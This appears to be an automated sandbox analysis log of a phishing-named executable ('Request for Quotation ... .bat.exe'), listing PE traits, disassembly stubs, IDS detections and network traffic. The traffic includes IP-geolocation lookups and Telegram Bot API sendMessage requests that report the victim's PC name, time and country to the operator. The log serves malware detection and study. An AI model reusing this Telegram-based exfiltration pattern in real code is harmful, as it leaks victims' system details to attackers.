DNS query: name: reallyfreegeoip.org

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 06C5B299h	0_2_06C5B736
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0125F45Dh	9_2_0125F2C0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0125F45Dh	9_2_0125F4AC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0125FC19h	9_2_0125F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05979280h	9_2_05978FB0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05977EB5h	9_2_05977B78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 059718A1h	9_2_059715F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597C826h	9_2_0597C558
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05970FF1h	9_2_05970D48
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597E816h	9_2_0597E548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05970741h	9_2_05970498
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05976733h	9_2_05976488
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597BF06h	9_2_0597BC38
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597DEF6h	9_2_0597DC28
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05973709h	9_2_05973460
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597DA66h	9_2_0597D798
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05975A29h	9_2_05975780
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597FA56h	9_2_0597F788
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597BA76h	9_2_0597B7A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 059779C9h	9_2_05977720
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05972A01h	9_2_05972758
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05972151h	9_2_05971EA8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05975179h	9_2_05974ED0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 059748C9h	9_2_05974620
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05977119h	9_2_05976E70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597D146h	9_2_0597CE78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597F136h	9_2_0597EE68
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05971449h	9_2_059711A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597ECA6h	9_2_0597E9D8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597CCB6h	9_2_0597C9E8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then mov esp, ebp	9_2_0597B081
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597E386h	9_2_0597E0B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597C396h	9_2_0597C0C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05970B99h	9_2_059708F0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 059732B1h	9_2_05973008
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 059762D9h	9_2_05976030
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 059702E9h	9_2_05970040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05972E59h	9_2_05972BB0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05975E81h	9_2_05975BD8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597B5E6h	9_2_0597B318
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 059725A9h	9_2_05972300
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597D5D6h	9_2_0597D308
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 059755D1h	9_2_05975328
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05977571h	9_2_059772C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 0597F5C6h	9_2_0597F2F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05976CC1h	9_2_05976A18
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05971CF9h	9_2_05971A50
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Code function: 4x nop then jmp 05974D21h	9_2_05974A78
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 069AA4F9h	11_2_069AA996
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 0166F45Dh	14_2_0166F2C0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 0166F45Dh	14_2_0166F52F
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 0166F45Dh	14_2_0166F4AC
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 0166FC19h	14_2_0166F961
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DB0D0Dh	14_2_06DB0B30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DB1697h	14_2_06DB0B30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBFAB9h	14_2_06DBF810
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DB31E0h	14_2_06DB2DC8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DB2C19h	14_2_06DB2968
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBE959h	14_2_06DBE6B0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBE501h	14_2_06DBE258
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06DB0673
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBE0A9h	14_2_06DBDE00
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBF661h	14_2_06DBF3B8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBF209h	14_2_06DBEF60
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBEDB1h	14_2_06DBEB08
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBD3A1h	14_2_06DBD0F8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBCF49h	14_2_06DBCCA0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06DB0853
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06DB0040
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DB31E0h	14_2_06DB2DC3
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBDC51h	14_2_06DBD9A8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DBD7F9h	14_2_06DBD550
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Code function: 4x nop then jmp 06DB31E0h	14_2_06DB310E

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49727 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49734 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49760 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49735 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 08:33:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
